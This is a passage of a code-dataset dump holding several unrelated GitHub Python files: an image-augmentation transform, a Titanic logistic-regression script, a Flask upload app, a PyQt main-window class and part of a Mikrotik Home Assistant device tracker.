image height/width\n self.kernel_size = kernel_size\n self.p = p\n\n def __call__(self, sample):\n sample = np.array(sample)\n\n # blur the image with a 50% chance\n prob = np.random.random_sample()\n\n if prob < self.p:\n sigma = (self.max - self.min) * np.random.random_sample() + self.min\n sample = cv2.GaussianBlur(sample, (self.kernel_size, self.kernel_size), sigma)\n\n return sample\n","repo_name":"chingyaoc/RINCE","sub_path":"ImageNet/simclr/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":6389,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"53"} +{"seq_id":"74533520487","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\ndata = pd.read_csv('train.csv')\nprint(data.head())\ndata = data.replace({'Embarked': {'S': 1, 'C': 2, 'Q': 3}, 'Sex': {'male': 1, 'female': 2}})\n#data.loc[data['Cabin'].notna(), 'Cabin'] = 1\n#data = data.fillna({'Cabin': 0})\ndata = data.fillna({'Age': data['Age'].mean()})\n\n#data[['Last_Name', 'First_Name']] = data['Name'].str.split(',', expand=True)\ny = data['Survived']\n\n#X = data[['Last_Name', 'Sex', 'Age', 'Pclass']]\nX = data[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked']]\nX = (X - X.mean()) / X.std()\nX.insert(0, 'Parch_age_Sex', value=X['Parch'] * X['Age'])\nX.insert(0, 'Sex_Parch', value=X['Sex'] * X['Parch'])\nX.insert(0, 'Sex_age', value=X['Sex'] * X['Age'])\n#X.insert(0, 'Parch_SibSp', value=X['Parch'] * X['SibSp'])\n#X.insert(0, 'Fare_Pclass', value=X['Fare'] * X['Pclass'])\nX.insert(0, 'Sex_SibSp', value=X['Sex'] * X['SibSp'])\nX.insert(0, 'Pclass_age', value=X['Pclass'] * X['Age'])\n#X.insert(0, 'Fare_age', value=X['Fare'] * X['Age'])\n#X.insert(0, 'Embarked_Fare', value=X['Embarked'] * X['Fare'])\nX = (X - X.mean()) / X.std()\nX = pd.get_dummies(X, columns=['Sex', 'Pclass', 'Embarked'])\n#X.insert(0, 'Cabin', value=data['Cabin'])\n\n#print(X.iloc[0:10, :])\n\nprint(X.head())\nprint(X.shape, y.shape, type(X), type(y))\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n#X_train, X_test, y_train, y_test = X.iloc[0:700, :], X.iloc[700:, :], y.iloc[0:700, ], y.iloc[700:, ]\n#print(X_train.shape, X_test.shape, y_test.shape, y_train.shape)\n\nlearningRate = 10\nepsilon = 0\n\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\n\n\ndef Costreg(theta, X, y, learningRate):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n\n first = np.multiply(-y, (np.log(sigmoid(X * theta.T) + epsilon)))\n second = np.multiply((1 - y), (np.log(1 - sigmoid(X * theta.T) + epsilon)))\n reg = (learningRate / (2 * len(X))) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))\n\n return np.sum(first - second) / len(X) + reg\n\n\ndef gradient(theta, X, y, learningRate):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n # parameters=int(theta.ravel().shape[1])\n # grad=np.zeros(parameters)\n\n error = sigmoid(X * theta.T) - y\n grad = ((X.T * error) / len(X)).T + ((learningRate / len(X)) * theta)\n grad[0, 0] = np.sum(np.multiply(error, X[:, 0])) / len(X)\n\n return np.array(grad).ravel()\n\n\nX_train.insert(0, 'ones', 1)\nX_test.insert(0, 'ones', 1)\ncols = list(X_train.columns.values)\nX_train = np.array(X_train.values)\nX_test = np.array(X_test.values)\ntheta = np.zeros(X_train.shape[1])\nprint(theta.shape)\ny_train = np.array(y_train.values).reshape(-1, 1)\ny_test = np.array(y_test.values).reshape(-1, 1)\n\n#print(y.shape, X.shape)\n#print(Costreg(theta, X, y, learningRate))\n#grad = gradient(theta, X, y, learningRate)\n#print(grad.shape, grad)\n\nimport scipy.optimize as opt\ntheta_min = opt.fmin_bfgs(f=Costreg, x0=theta, fprime=gradient, args=(X_train, y_train, learningRate))\nprint(theta_min)\n\ntheta_min = np.matrix(theta_min)\n\n\ndef predict_survival(X, theta):\n p = sigmoid(X * theta.T)\n return [1 if x > 0.5 else 0 for x in p]\n\n\npredict = predict_survival(X_test, theta_min)\n\ncorrect = [1 if (a == 0 and b == 0) or (a == 1 and b == 1) else 0 for a, b in zip(predict, y_test)]\naccuracy = (sum(map(int, correct)) / len(correct))\nprint(accuracy)\nprint('accuracy = {0}%'.format(accuracy * 100))\n","repo_name":"BabaCafe/Titanic","sub_path":"titanic_log.py","file_name":"titanic_log.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30849814400","text":"import numpy as np\nfrom ..utils import rmean\nimport matplotlib.pyplot as plt\n\n\ndef id_reconstruction(images, save=False):\n \"\"\"Identify a reconstruction event by analyzing changes in\n the forces.\n\n Parameters\n ----------\n images : list of ASE atoms objects\n Relaxation trajectory.\n show : bool\n Create a figure to display the events located.\n\n Returns\n -------\n predicted_events: list of int\n index of images predicted before the event occurs.\n \"\"\"\n forces = []\n for i, atoms in enumerate(images):\n forces += [np.sqrt((atoms.get_forces()**2).sum())]\n forces = np.array(forces)\n\n frm = rmean(forces)\n fdiff = np.diff(frm)\n fterm = np.array([fdiff > 0.25 * frm[:-1]]).astype(int)[0]\n predicted_events = np.where(fterm[:-1] < fterm[1:])[0]\n\n if save:\n fig, ax = plt.subplots(figsize=(6, 4))\n l, = plt.plot(range(1, len(images) + 1), frm)\n ax.fill_between(\n range(1,\n len(images) + 1),\n np.zeros(len(images)),\n frm,\n facecolor=l.get_color(),\n alpha=0.5,\n interpolate=True)\n for i in predicted_events:\n plt.text(i - 1, 0.9, i)\n plt.axvline(i, ls='--', color='0.4')\n\n ylim = ax.get_ylim()\n plt.xlim(4, len(images))\n plt.ylim(0, ylim[1])\n plt.xlabel('Relaxation step')\n plt.ylabel('Force running mean (eV/$\\AA$)')\n plt.savefig(save)\n plt.close()\n\n return predicted_events\n","repo_name":"zqhuang2014/CatKit","sub_path":"catkit/gen/analysis/reconfiguration.py","file_name":"reconfiguration.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"7882575632","text":"import ast\n\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request, redirect, url_for\nfrom PIL import Image\n\napp = Flask(__name__)\n\n@app.route('/hello/')\n@app.route('/hello/')\ndef hello_world(user=None): # put application's code here\n return render_template('hello.html', user=user)\n\n@app.route('/end')\ndef end_world():\n return render_template('end.html')\n\n@app.route('/ai', methods=['GET', 'POST'])\ndef ai():\n if request.method == 'POST':\n file = request.files['file']\n if file:\n img = Image.open(request.files['file'].stream)\n parcel = {\n \"width\": img.width,\n \"height\": img.height\n }\n return redirect(url_for('diagram', parcel=parcel))\n return render_template('ai.html')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/diagram/')\n@app.route('/diagram/')\ndef diagram(parcel=None):\n dict = ast.literal_eval(parcel)\n return render_template('diagram.html', parcel=dict)\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Affamen/NN_Site","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27965682546","text":"# import sys\n# a = sys.stdin.readline()\n# aa = set(sys.stdin.readline().rstrip().split(\" \"))\n# b = sys.stdin.readline()\n# bb = sys.stdin.readline().rstrip().split(\" \")\n\n# for i in bb:\n# if i in aa:\n# print(1)\n# else:\n# print(0)\n\n# a = int(input())\n# a_list = []\n# for i in range(a):\n# a,b = map(int, input().split())\n# a_list.append([a,b])\n# b_list = sorted(a_list, key = lambda x : x[1])\n# b_list = sorted(b_list, key = lambda x : x[0])\n# for i in b_list:\n# print(i[0],i[1])\n\n# the_num = int(input())\n# a_list = []\n# for i in range(the_num):\n# a = input().split()\n# a[0] = int(a[0])\n# a.append(i)\n# a_list.append(a)\n# a = sorted(a_list, key= lambda x : x[2])\n# a = sorted(a, key= lambda x : x[0])\n# for i in a:\n# print(i[0],i[1])\n# 백준기준 31923위\n\nimport sys\n\na = sys.stdin.readline().rstrip().split()\nstart = int(a[0])\njump = int(a[1])\ncount =0\na_list = []\nwhile True:\n count+=1\n if jump*count < start:\n if jump*count not in a_list:\n a_list.append(jump*count)\n a_list.append(start-jump*count)\n else:\n jump=jump-1\n count = 0\n\n\n\n\n\n ","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2021/11월/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19417943862","text":"from PyQt5 import Qt, QtCore\nfrom enum import Enum\nimport copy\n\nfrom app.core.utils import SingletonDecorator\nfrom app.core import model as sc\nfrom app.core.ui.processingDialog import ProcessingDialog\n\n\nclass DockAreaId(Enum):\n Top = Qt.Qt.TopDockWidgetArea\n Bottom = Qt.Qt.BottomDockWidgetArea\n Right = Qt.Qt.RightDockWidgetArea\n Left = Qt.Qt.LeftDockWidgetArea\n\n\n@SingletonDecorator\nclass MainWindow(Qt.QMainWindow):\n def __init__(self, parent=None, title=None):\n Qt.QMainWindow.__init__(self, parent)\n self.setAttribute(Qt.Qt.WA_DeleteOnClose)\n\n self._actions = dict()\n\n self._initMenu()\n\n self._initDock()\n\n self._initCentralWidget()\n\n self._windowMenu = None\n self._dockOptionMenu = None\n self._activeWindowMenu = None\n\n if title is not None:\n if not isinstance(title, str):\n raise TypeError(\"String expected\")\n self.setWindowTitle(title)\n\n # =============================================================================\n # Funciones de inicialización\n # =============================================================================\n\n def _initMenu(self):\n self._menus = dict()\n _menuBar = self.menuBar()\n _menuBar.setNativeMenuBar(False)\n self._menus[None] = _menuBar\n\n self.addAction(\"&New\", shortcut=(QtCore.Qt.Key_N | QtCore.Qt.CTRL))\n self.addAction(\"&Load\", shortcut=(QtCore.Qt.Key_L | QtCore.Qt.CTRL))\n self.addAction(\"&Save\", shortcut=(QtCore.Qt.Key_S | QtCore.Qt.CTRL))\n self.addAction(\"&Quit\", shortcut=(QtCore.Qt.Key_Q | QtCore.Qt.CTRL))\n\n self.addAction2Menu(\"&New\", [\"Scene\"])\n self.addAction2Menu(\"&Load\", [\"Scene\"])\n self.addAction2Menu(\"&Save\", [\"Scene\"])\n self.addAction2Menu(\"&Quit\", [\"Scene\"])\n\n def newScene():\n ok = self.confirmMsg(\"Are you sure you want to create a new Scene?\",\n info=\"Any unsaved changes will be lost\")\n\n if ok: sc.Scene().new()\n\n def loadScene():\n ok = self.confirmMsg(\"Are you sure you want to load a Scene?\",\n info=\"Any unsaved changes will be lost\")\n if ok:\n fn = self.loadFileDialog(filters=[\"Scene (*.scn)\",\n \"All Files (*)\"])\n\n if fn is not None:\n\n def load():\n if not sc.Scene().loadz(fn[0]):\n raise IOError(fn[0])\n\n if not self.processDialog(cb=load, isICB=False,\n wtitle=\"Loading...\",\n title=\"Loading scene...\",\n closeOnFinished=True,\n hideConsole=True):\n self.warningMsg(\"The scene file cannot be opened\")\n\n def saveScene():\n fn = self.saveFileDialog(filters=[\"Scene (*.scn)\",\n \"All Files (*)\"])\n\n if fn is not None:\n def save():\n if not sc.Scene().savez(fn[0]):\n raise IOError(fn[0])\n\n if not self.processDialog(cb=save, isICB=False,\n wtitle=\"Saving...\",\n title=\"Saving scene...\",\n closeOnFinished=True,\n hideConsole=True):\n self.warningMsg(\"The scene file cannot be writte\")\n\n self.addActionCB(\"&New\", newScene)\n self.addActionCB(\"&Load\", loadScene)\n self.addActionCB(\"&Save\", saveScene)\n self.addActionCB(\"&Quit\", self.close)\n\n def _initDock(self):\n self.setDockOptions(self.dockOptions() |\n Qt.QMainWindow.AllowNestedDocks |\n Qt.QMainWindow.GroupedDragging)\n self._docks = []\n\n self.setStyleSheet('''QMainWindow::separator {\n \t\tbackground: rgb(100, 100, 100);\n \t\twidth: 4px;\n \t\theight: 4px;}''')\n\n # self.setStyleSheet('''QDockWidget {padding-left: 10px;\n # padding-right: 10px;\n # border-style: outset;\n # border-width: 4px;\n # border-color: black;}''')\n # border: 10px solid lightgray; background: black}''')\n\n def _initCentralWidget(self):\n self._centralWidget = Qt.QTabWidget(self)\n self.setCentralWidget(self._centralWidget)\n self._centralWidget.hide()\n self._tabs = []\n\n # =============================================================================\n # Gestión de acciones y menus\n # =============================================================================\n\n def createWindowMenu(self, menuPath=None, mainWindowConfig=True):\n if menuPath is not None:\n if not isinstance(menuPath, str):\n if not isinstance(menuPath, list) or \\\n all(isinstance(i, str) for i in menuPath):\n raise TypeError(\"String or list of strings expected\")\n else:\n mp = menuPath\n else:\n mp = [menuPath]\n else:\n mp = [\"Window\"]\n\n # ''.join(random.choices(string.ascii_uppercase + string.digits, k=N))\n pf = \"_&%234&&_\"\n self._pf = pf\n\n self._windowMenu = self.createMenu(menuPath=mp)\n self._activeWindowMenu = self.createPopupMenu()\n\n action = self._windowMenu.addMenu(self._activeWindowMenu)\n action.setText(\"Active Windows\")\n\n if mainWindowConfig:\n self._windowMenu.addSeparator()\n mp.append(\"Dock Options\")\n self._dockOptionMenu = self.createMenu(menuPath=mp)\n\n def setOptions():\n if self._dockOptionMenu is None: return\n\n opts = Qt.QMainWindow.DockOption(0)\n actions = self._dockOptionMenu.actions()\n optsList = (Qt.QMainWindow.AnimatedDocks,\n Qt.QMainWindow.AllowNestedDocks,\n Qt.QMainWindow.AllowTabbedDocks,\n Qt.QMainWindow.ForceTabbedDocks,\n Qt.QMainWindow.VerticalTabs,\n Qt.QMainWindow.GroupedDragging)\n\n for a, o in zip(actions, optsList):\n if a.isChecked(): opts = opts | o\n\n self.setDockOptions(opts)\n\n def addAction(name, prop):\n action = self.addAction(name, prefix=pf)\n self.addAction2Menu(name, menuPath=mp, prefix=pf)\n action.setCheckable(True);\n action.setChecked(self.dockOptions() & prop)\n self.addActionCB(name, setOptions, prefix=pf)\n\n addAction(\"Animated docks\", Qt.QMainWindow.AnimatedDocks)\n addAction(\"Allow nested docks\", Qt.QMainWindow.AllowNestedDocks)\n addAction(\"Allow tabbed docks\", Qt.QMainWindow.AllowTabbedDocks)\n addAction(\"Force tabbed docks\", Qt.QMainWindow.ForceTabbedDocks)\n addAction(\"Top tabs\", Qt.QMainWindow.VerticalTabs)\n addAction(\"Grouped dragging\", Qt.QMainWindow.GroupedDragging)\n\n def addAction(self, name, prefix=None, icon=None, shortcut=None):\n key = prefix + name if prefix is not None else name\n\n entry = self._actions.get(key)\n if entry is None:\n action = Qt.QAction(self)\n action.setText(name)\n\n entry = {'action': action, 'triggerCBs': None}\n\n def func():\n cb = self._actions[key]['triggerCBs']\n if cb is not None:\n cb()\n\n setattr(self, \"_\" + key, Qt.pyqtSlot()(func))\n action.triggered.connect(getattr(self, \"_\" + key))\n # action.toggled.connect(getattr(self,\"_\"+key))\n\n self._actions[key] = entry\n\n else:\n action = entry['action']\n\n if icon is not None:\n action.setIcon(icon)\n\n if shortcut is not None:\n action.setShortcut(shortcut)\n\n self._actions[key]['action'] = action\n\n return action\n\n def addActionCB(self, name, cb, prefix=None):\n key = prefix + name if prefix is not None else name\n if (self._actions.get(key)) is None: return None\n\n entry = self._actions[key]\n entry['triggerCBs'] = cb\n\n return entry['action']\n\n def getMenu(self, menuPath=None):\n if menuPath is None:\n return self._menus.get(None)\n else:\n self._menus.get(tuple(menuPath))\n\n def createMenu(self, menuPath=None):\n if menuPath is None: menuPath = list()\n menu = None\n\n stack = copy.copy(menuPath)\n toCreate = list()\n\n for i in range(len(menuPath)):\n menu = self._menus.get(tuple(stack))\n if menu is not None:\n break\n\n toCreate.append(stack.pop(-1))\n\n if menu is None:\n menu = self._menus.get(None)\n\n toCreate.reverse()\n for item in toCreate:\n stack.append(item)\n menu = menu.addMenu(item)\n self._menus[tuple(stack)] = menu\n\n return menu\n\n def addAction2Menu(self, name, menuPath=None, prefix=None):\n key = prefix + name if prefix is not None else name\n if (self._actions.get(key)) is None: return\n\n menu = self.createMenu(menuPath=menuPath)\n menu.addAction(self._actions[key]['action'])\n\n # def addAction2Toolbar(name,toolbarName):\n # pass\n #\n\n # =============================================================================\n # Ventanas modales\n # =============================================================================\n @staticmethod\n def warningMsg(msg):\n # !todo: Asegurar que se borran al concluir sin llamar a deleteLater\n # https://www.tutorialspoint.com/pyqt/pyqt_qmessagebox.htm\n msgBox = Qt.QMessageBox()\n msgBox.setText(msg)\n msgBox.setWindowTitle(\"Warning\")\n msgBox.setIcon(Qt.QMessageBox.Warning)\n msgBox.setWindowFlags(msgBox.windowFlags() &\n ~Qt.Qt.WindowCloseButtonHint)\n return msgBox.exec()\n\n @staticmethod\n def confirmMsg(question, info=None):\n msgBox = Qt.QMessageBox()\n msgBox.setText(question)\n msgBox.setInformativeText(info)\n msgBox.setWindowTitle(\"Please, confirm operation\")\n msgBox.setIcon(Qt.QMessageBox.Question)\n msgBox.setWindowFlags(msgBox.windowFlags() &\n ~Qt.Qt.WindowCloseButtonHint)\n msgBox.setStandardButtons(Qt.QMessageBox.Ok | Qt.QMessageBox.Cancel)\n msgBox.setEscapeButton(Qt.QMessageBox.Cancel)\n msgBox.setDefaultButton(Qt.QMessageBox.Cancel)\n\n return msgBox.exec() == Qt.QMessageBox.Ok\n\n @staticmethod\n def processDialog(cb,\n isICB,\n wtitle=None,\n title=None,\n iconNum=1,\n finishMsg=None,\n terminateMsg=None,\n closeOnFinished=True,\n closeButtonEnabled=True,\n hideConsole=False,\n hideProgressBar=False):\n\n w = ProcessingDialog(title=title, iconNum=iconNum)\n w.setWindowTitle(wtitle)\n w.closeOnFinished = closeOnFinished\n w.closeButtonEnabled = closeButtonEnabled\n w.hideConsole = hideConsole\n w.hideProgressBar = hideProgressBar\n\n if finishMsg is not None:\n w.finishMsg = finishMsg\n else:\n w.finishMsg = \\\n \"\"\"\n #################################\n ## Finalizado\n #################################\n \"\"\"\n\n if terminateMsg is not None:\n w.terminateMsg = terminateMsg\n else:\n w.terminateMsg = \\\n \"\"\"\n #################################\n ## Terminate\n #################################\n \"\"\"\n\n if isICB:\n r = w.execICB(cb)\n else:\n r = w.execCB(cb)\n\n return r == Qt.QDialog.Accepted\n\n @staticmethod\n def loadFileDialog(filters=None, dir_=None, title=\"Please, select a valid file\"):\n dialog = Qt.QFileDialog()\n dialog.setWindowTitle(title)\n dialog.setFileMode(Qt.QFileDialog.ExistingFile)\n dialog.setAcceptMode(Qt.QFileDialog.AcceptOpen)\n\n if dir_ is None: dir_ = \".\"\n dialog.setDirectory(dir_)\n\n if filters is not None:\n dialog.setNameFilters(filters)\n\n if dialog.exec():\n fileName = dialog.selectedFiles()\n if (len(fileName) == 0):\n return None\n else:\n return fileName\n else:\n return None\n\n @staticmethod\n def saveFileDialog(filters=None, dir_=None):\n dialog = Qt.QFileDialog()\n dialog.setWindowTitle(\"Please, select a file\")\n dialog.setFileMode(Qt.QFileDialog.AnyFile)\n dialog.setAcceptMode(Qt.QFileDialog.AcceptSave)\n\n if dir_ is None: dir_ = \".\"\n dialog.setDirectory(dir_)\n\n if filters is not None:\n dialog.setNameFilters(filters)\n\n if dialog.exec():\n fileName = dialog.selectedFiles()\n if (len(fileName) == 0):\n return None\n else:\n return fileName\n else:\n return None\n\n @staticmethod\n def saveDirectoryDialog(dir_=None):\n dialog = Qt.QFileDialog()\n\n if dir_ is None: dir_ = \".\"\n dialog.setDirectory(dir_)\n\n fileName = dialog.getExistingDirectory()\n if (len(fileName) == 0):\n return None\n else:\n return fileName\n\n # =============================================================================\n # Gestión de ventanas\n # =============================================================================\n\n def createDockableWidget(self, widget, title, dockAreaId=None,\n hideOnClose=True):\n\n if dockAreaId is None:\n dockAreaId = DockAreaId.Right\n\n dock = Qt.QDockWidget(title, self)\n\n # !todo: is really necesary\n widget.setParent(dock)\n dock.setWidget(widget)\n dock.setFloating(False)\n self._docks.append(dock)\n\n nfound = True\n for d in self._docks:\n if self.dockWidgetArea(d) == dockAreaId.value:\n dock.show()\n self.tabifyDockWidget(d, dock)\n\n nfound = False\n break\n\n if nfound: self.addDockWidget(dockAreaId.value, dock)\n\n if self._activeWindowMenu is not None:\n actions = self.createPopupMenu().actions()\n for a in actions:\n self._activeWindowMenu.addAction(a)\n\n if not hideOnClose:\n # dock.setAttribute(Qt.Qt.WA_DeleteOnClose)\n def closeButtonClk(bool):\n\n ok = self.confirmMsg(\n \"Do you really want to close this window?\\n\" +\n \"Unsaved changes will be lost\")\n\n if ok:\n dock.hide()\n #dock.setAttribute(Qt.Qt.WA_DeleteOnClose)\n dock.close()\n else:\n dock.show()\n\n b = dock.findChildren(Qt.QAbstractButton,\n \"qt_dockwidget_closebutton\")[0]\n b.clicked.connect(copy.copy(closeButtonClk))\n\n return dock\n\n def createCentralTab(self, widget, title, icon=None):\n self._tabs.append(widget)\n return self._centralWidget.addTab(widget, title)\n\n\nif __name__ == '__main__':\n import sys\n import time\n\n app = Qt.QApplication(sys.argv)\n ex = MainWindow()\n ex2 = MainWindow() # prueba singleton\n\n for i in range(3):\n listWidget = Qt.QListWidget()\n listWidget.addItem(\"item1\")\n listWidget.addItem(\"item2\")\n listWidget.addItem(\"item3\")\n\n ex.createDockableWidget(listWidget, \"R\" + str(i))\n\n for i in range(3):\n listWidget = Qt.QListWidget()\n listWidget.addItem(\"item1\")\n listWidget.addItem(\"item2\")\n listWidget.addItem(\"item3\")\n ex2.createDockableWidget(listWidget, \"L\" + str(i),\n dockAreaId=DockAreaId.Left)\n for i in range(3):\n listWidget = Qt.QListWidget()\n listWidget.addItem(\"item1\")\n listWidget.addItem(\"item2\")\n listWidget.addItem(\"item3\")\n ex2.createCentralTab(listWidget, \"C\" + str(i))\n\n ex.show()\n\n\n def test():\n for i in range(10):\n yield i * 10\n print(i)\n time.sleep(1)\n\n\n print(ex.processDialog(test,\n True,\n wtitle=None,\n title=None,\n iconNum=1,\n finishMsg=None,\n terminateMsg=None,\n closeOnFinished=False,\n closeButtonEnabled=True,\n hideConsole=False,\n hideProgressBar=False))\n\n sys.exit(app.exec())\n","repo_name":"NCToader/DeepSpineTool","sub_path":"app/core/ui/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":17738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23079154867","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 17 08:54:31 2023\n\n@author: sebas\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef step_function(x):\n return np.where(x >= 0, 1, 0)\n\n# Generar valores de x en el rango de -10 a 10\nx = np.linspace(-2, 2, 100)\n\n# Calcular los valores de y para la función escalón\ny1 = step_function(x)\n\n# Calcular los valores de y para la función escalón desplazada\ny2 = step_function(x - 0.5)\nfig, ax = plt.subplots(figsize=(10, 6))\n# Graficar ambas funciones en el mismo plot\n#plt.plot(x, y1, color='blue', label='sin bias')\nplt.plot(x, y2, color='red') #label='con bias')\n\n# Agregar títulos y leyendas\nplt.title('Gráfico de los valores de salida', fontweight='bold')\nplt.xlabel('w*x', fontweight='bold')\nplt.ylabel('Magnitud', fontweight='bold')\nplt.legend()\nax.grid(True)\n# Mostrar el gráfico\nplt.show()\n","repo_name":"sebas2868/Paper-MLP","sub_path":"Codigos/Función escalón desplazada.py","file_name":"Función escalón desplazada.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32599740060","text":"\"\"\"Support for the Mikrotik Router device tracker.\"\"\"\n\nimport logging\nfrom typing import Any, Dict\nfrom datetime import timedelta\n\nfrom homeassistant.components.device_tracker.config_entry import ScannerEntity\nfrom homeassistant.components.device_tracker.const import SOURCE_TYPE_ROUTER\nfrom homeassistant.const import (\n CONF_NAME,\n ATTR_ATTRIBUTION,\n)\nfrom homeassistant.core import callback\nfrom homeassistant.helpers.device_registry import CONNECTION_NETWORK_MAC\nfrom homeassistant.helpers.dispatcher import async_dispatcher_connect\nfrom homeassistant.util.dt import get_age, utcnow\n\nfrom .const import (\n DOMAIN,\n DATA_CLIENT,\n ATTRIBUTION,\n CONF_TRACK_HOSTS,\n DEFAULT_TRACK_HOSTS,\n CONF_TRACK_HOSTS_TIMEOUT,\n DEFAULT_TRACK_HOST_TIMEOUT,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nDEVICE_ATTRIBUTES_HOST = [\n \"host-name\",\n \"address\",\n \"mac-address\",\n \"interface\",\n \"source\",\n \"last-seen\",\n]\n\n\n# ---------------------------\n# format_attribute\n# ---------------------------\ndef format_attribute(attr):\n res = attr.replace(\"-\", \" \")\n res = res.capitalize()\n res = res.replace(\" ip \", \" IP \")\n res = res.replace(\" mac \", \" MAC \")\n res = res.replace(\" mtu\", \" MTU\")\n return res\n\n\n# ---------------------------\n# format_value\n# ---------------------------\ndef format_value(res):\n res = res.replace(\"dhcp\", \"DHCP\")\n res = res.replace(\"dns\", \"DNS\")\n res = res.replace(\"capsman\", \"CAPsMAN\")\n res = res.replace(\"wireless\", \"Wireless\")\n res = res.replace(\"restored\", \"Restored\")\n return res\n\n\n# ---------------------------\n# async_setup_entry\n# ---------------------------\nasync def async_setup_entry(hass, config_entry, async_add_entities):\n \"\"\"Set up device tracker for Mikrotik Router component.\"\"\"\n inst = config_entry.data[CONF_NAME]\n mikrotik_controller = hass.data[DOMAIN][DATA_CLIENT][config_entry.entry_id]\n tracked = {}\n\n @callback\n def update_controller():\n \"\"\"Update the values of the controller.\"\"\"\n update_items(\n inst, config_entry, mikrotik_controller, async_add_entities, tracked\n )\n\n mikrotik_controller.listeners.append(\n async_dispatcher_connect(\n hass, mikrotik_controller.signal_update, update_controller\n )\n )\n\n update_controller()\n\n\n# ---------------------------\n# update_items\n# ---------------------------\n@callback\ndef update_items(inst, config_entry, mikrotik_controller, async_add_entities, tracked):\n \"\"\"Update tracked device state from the controller.\"\"\"\n new_tracked = []\n\n # Add switches\n for sid, sid_uid, sid_name, sid_ref, sid_func in zip(\n # Data point name\n [\"host\"],\n # Data point unique id\n [\"mac-address\"],\n # Entry Name\n [\"host-name\"],\n # Entry Unique id\n [\"mac-address\"],\n # Tracker function\n [\n MikrotikControllerHostDeviceTracker,\n ],\n ):\n for uid in mikrotik_controller.data[sid]:\n if (\n # Skip if host tracking is disabled\n sid == \"host\"\n and not config_entry.options.get(CONF_TRACK_HOSTS, DEFAULT_TRACK_HOSTS)\n ):\n continue\n\n # Update entity\n item_id = f\"{inst}-{sid}-{mikrotik_controller.data[sid][uid][sid_uid]}\"\n _LOGGER.debug(\"Updating device_tracker %s\", item_id)\n if item_id in tracked:\n if tracked[item_id].enabled:\n tracked[item_id].async_schedule_update_ha_state()\n continue\n\n # Create new entity\n sid_data = {\n \"sid\": sid,\n \"sid_uid\": sid_uid,\n \"sid_name\": sid_name,\n \"sid_ref\": sid_ref,\n }\n tracked[item_id] = sid_func(\n inst, uid, mikrotik_controller, config_entry, sid_data\n )\n new_tracked.append(tracked[item_id])\n\n # Register new entities\n if new_tracked:\n async_add_entities(new_tracked)\n\n\n# ---------------------------\n# MikrotikControllerDeviceTracker\n# ---------------------------\nclass MikrotikControllerDeviceTracker(ScannerEntity):\n \"\"\"Representation of a device tracker.\"\"\"\n\n def __init__(self, inst, uid, mikrotik_controller, config_entry, sid_data):\n \"\"\"Set up a device tracker.\"\"\"\n self._sid_data = sid_data\n self._inst = inst\n self._ctrl = mikrotik_controller\n self._data = mikrotik_controller.data[self._sid_data[\"sid\"]][uid]\n self._config_entry = config_entry\n\n self._attrs = {\n ATTR_ATTRIBUTION: ATTRIBUTION,\n }\n\n @property\n def entity_registry_enabled_default(self):\n \"\"\"Return if the entity should be enabled when first added to the entity registry.\"\"\"\n return True\n\n async def async_added_to_hass(self):\n \"\"\"Run when entity about to be added to hass.\"\"\"\n _LOGGER.debug(\n \"New device tracker %s (%s %s)\",\n self._inst,\n self._sid_data[\"sid\"],\n self._data[self._sid_data[\"sid_uid\"]],\n )\n\n async def async_update(self):\n \"\"\"Synchronize state with controller.\"\"\"\n\n @property\n def source_type(self) -> str:\n \"\"\"Return the source type of the port.\"\"\"\n return SOURCE_TYPE_ROUTER\n\n @property\n def name(self) -> str:\n \"\"\"Return the name.\"\"\"\n if self._sid_data[\"sid\"] == \"interface\":\n return f\"{self._inst} {self._data[self._sid_data['sid_name']]}\"\n\n return f\"{self._data[self._sid_data['sid_name']]}\"\n\n @property\n def unique_id(self) -> str:\n \"\"\"Return a unique id for this entity.\"\"\"\n return f\"{self._inst.lower()}-{self._sid_data['sid']}-{self._data[self._sid_data['sid_ref']]}\"\n\n @property\n def available(self) -> bool:\n \"\"\"Return if controller is available.\"\"\"\n return self._ctrl.connected()\n\n @property\n def device_info(self) -> Dict[str, Any]:\n \"\"\"Return a description for device registry.\"\"\"\n info = {\n \"connections\": {\n (CONNECTION_NETWORK_MAC, self._data[self._sid_data[\"sid_ref\"]])\n },\n \"manufacturer\": self._ctrl.data[\"resource\"][\"platform\"],\n \"model\": self._ctrl.data[\"resource\"][\"board-name\"],\n \"name\": self._data[self._sid_data[\"sid_name\"]],\n }\n if self._sid_data[\"sid\"] == \"interface\":\n info[\"name\"] = f\"{self._inst} {self._data[self._sid_data['sid_name']]}\"\n return info\n\n @property\n def device_state_attributes(self) -> Dict[str, Any]:\n \"\"\"Return the state attributes.\"\"\"\n 